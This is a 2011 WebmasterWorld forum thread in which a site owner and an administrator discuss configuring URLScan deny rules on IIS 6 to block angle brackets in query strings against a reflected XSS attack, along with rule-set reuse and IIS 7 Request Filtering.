Welcome to WebmasterWorld Guest from 54.82.93.116

Forum Moderators: ocean10000

Message Too Old, No Replies

URLScan Help

     
12:59 pm on Feb 26, 2011 (gmt 0)

Senior Member

WebmasterWorld Senior Member 10+ Year Member

joined:June 13, 2002
posts:2175
votes: 0


Does anyone know how to set a rule to apply only to the stuff after the ? - querystring not url.

There is a particular refelcted xss attack thats making my visitors with old browsers think they are on another site by circulating links with a script tag in the url that places a competitor logo over my logo using css.

I just want to add a rule to put the word script after the '?' character
4:12 pm on Feb 26, 2011 (gmt 0)

Administrator

WebmasterWorld Administrator 10+ Year Member Top Contributors Of The Month

joined:Jan 14, 2004
posts:864
votes: 3


Creating a Deny List of Query String Sequences


[Options]
UnescapeQueryString=1
[DenyQueryStringSequences]
<
>


This should block script tags in the url in both un-escaped and escaped forms and block them.

As it blocks the angle brackets from being allowed in the url string.

Reference
Common UrlScan Scenarios [learn.iis.net]
5:54 pm on Mar 15, 2011 (gmt 0)

Senior Member

WebmasterWorld Senior Member 10+ Year Member

joined:June 13, 2002
posts:2175
votes: 0


Are you good with this tool, if so sticky me pls.
7:03 pm on Mar 15, 2011 (gmt 0)

Administrator

WebmasterWorld Administrator 10+ Year Member Top Contributors Of The Month

joined:Jan 14, 2004
posts:864
votes: 3


What type of problems are you trying to handle with the URLScan tool? Did the previous post not help or work? Maybe question can be answered here in public and the answers posted can help others in your situation.
1:52 pm on Mar 18, 2011 (gmt 0)

Senior Member

WebmasterWorld Senior Member 10+ Year Member

joined:June 13, 2002
posts:2175
votes: 0


I'm just trying to understand it at high level to apply some rules to different sites and apps.

I have a various sites that allow uploads and access to uploaded files and dont have to hand all the different urls used so am reactively adding exceptions as and when the logs show me.

Ideally I want to whitelist these urls from just the denied query strings, not the denied urls
2:50 pm on Mar 21, 2011 (gmt 0)

Senior Member

WebmasterWorld Senior Member 10+ Year Member

joined:June 13, 2002
posts:2175
votes: 0


What does the DenyDataSection do ? Does it overrule DenyURLSequenecs and DenyQuerStrings or apply in addition

Does 404 apply before or after URL Scan rules?


If Denied extentions includes .exe and AppliesTo only includes .aspx , will .exe files be blocked

When do rule and option changes take effect ?
12:25 am on Mar 22, 2011 (gmt 0)

Administrator

WebmasterWorld Administrator 10+ Year Member Top Contributors Of The Month

joined:Jan 14, 2004
posts:864
votes: 3


After doing a bit of research "DenyDataSection" is a way to reuse rulesets in the ini file.

link [learn.iis.net]


[Options]
RuleList=MyAspRule,MyPhpRule

[MyAspRule]
AppliesTo=.asp, .aspx
DenyDataSection=MyRuleData
ScanURL=0
ScanAllRaw=1
ScanQueryString=1
ScanHeaders=
DenyUnescapedPercent=1

[MyPhpRule]
AppliesTo=.php
DenyDataSection=MyRuleData
ScanURL=1
ScanAllRaw=0
ScanQueryString=1
ScanHeaders=
DenyUnescapedPercent=1

[MyRuleData]
< ; Used by script injection attacks.
> ; Used by script injection attacks.
@ ; Used by script injection attacks.
2:09 am on Mar 22, 2011 (gmt 0)

Administrator

WebmasterWorld Administrator 10+ Year Member Top Contributors Of The Month

joined:Jan 14, 2004
posts:864
votes: 3


Does 404 apply before or after URL Scan rules?


404 are applied after the URLScan is run.
3:56 am on Mar 22, 2011 (gmt 0)

Administrator

WebmasterWorld Administrator 10+ Year Member Top Contributors Of The Month

joined:Jan 14, 2004
posts:864
votes: 3


Does it overrule DenyURLSequenecs and DenyQuerStrings or apply in addition


I can't find any info on this. But my guess it is in addition to the existing rules.
4:23 pm on Mar 22, 2011 (gmt 0)

Senior Member

WebmasterWorld Senior Member 10+ Year Member

joined:June 13, 2002
posts:2175
votes: 0


Thanks

I cant get that common data to work, its not clear whether it applies to URL, Querystring, VERB, Form Data etc.

There doesnt seem much in the wa of documentation, do you know if its been superceeded by another tool ?
4:53 pm on Mar 22, 2011 (gmt 0)

Administrator

WebmasterWorld Administrator 10+ Year Member Top Contributors Of The Month

joined:Jan 14, 2004
posts:864
votes: 3


The common data only will work with the latest version 3.51 I believe of URLscan. If you have a previous version it will not work. Also Changes to the ini are only refresh after restarting IIS completely.

Microsoft is pushing "Request Filtering" in IIS 7. I don't see any options for this to work in versions previous to this though.
Request Filtering [iis.net]
8:48 pm on Mar 22, 2011 (gmt 0)

Senior Member

WebmasterWorld Senior Member 10+ Year Member

joined:June 13, 2002
posts:2175
votes: 0


That looks much better, but for my 2003 Servers Ill have to stick with URLScan for now.
 

Join The Conversation

Moderators and Top Contributors

Hot Threads This Week

Featured Threads

Free SEO Tools

Hire Expert Members